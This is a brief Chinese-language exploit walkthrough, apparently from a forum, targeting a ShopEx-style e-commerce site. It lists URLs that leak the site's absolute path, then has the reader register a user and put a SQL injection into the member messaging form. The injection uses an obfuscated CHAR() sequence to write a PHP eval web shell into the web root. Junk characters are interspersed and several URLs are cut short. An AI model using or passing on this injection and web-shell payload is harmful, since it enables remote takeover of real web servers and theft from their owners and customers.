第一个:想办法找到目标网站的绝对路径
7 h) ?9 J2 Z- T5 b# r/ q( L! H& H; h6 J; Z8 R" g* l
http://www.political-security.com/install/svinfo.php?phpinfo=true
`/ c( k. E2 J6 L; X! w' C6 D/ S$ N
http:/www.political-security.com/core/api/shop_api.php0 V. H( Q! S* Z
h+ E: Y6 w( Q! [
http://www.political-security.co ... api_b2b_2_0_cat.php6 O: ^: {8 V' B7 h/ i$ W- W% ?
. I2 Z3 y1 g9 Xhttp://www.political-security.com/core/ap ... b_2_0_goodstype.php9 _8 v/ y$ i) y4 r9 H
X# i! A( }9 g% J: phttp://www.political-security.co ... i_b2b_2_0_brand.php
; G1 @7 }! I: k+ t第二个:注册一个普通用户" J! m9 p( f! n& s O) t+ E
7 I+ i" f* a" s4 @$ s
http://www.political-security.com/?passport-signup.html5 m" u- {0 C# c7 K) j. J1 q4 x
1 J S- F7 r- I& Y1 V, P
第三个: 发送消息
3 c5 ~( D; C# z r0 O( w
3 | o; }; w) T; nhttp://www.political-security.com/?member-send.html2 e s& ^" G6 r$ w e" ]8 m
发送给中填写
& @/ l8 E- v% v9 xantian365.com' union select CHAR(60, 63, 112, 104, 112, 32, 64, 101, 118, 97, 108, 40, 36, 95, 80, 79, 83, 84, 91, 39, 35, 39, 93, 41, 59, 63, 62) into outfile 'E:/zkeysoft/www/x.php' # |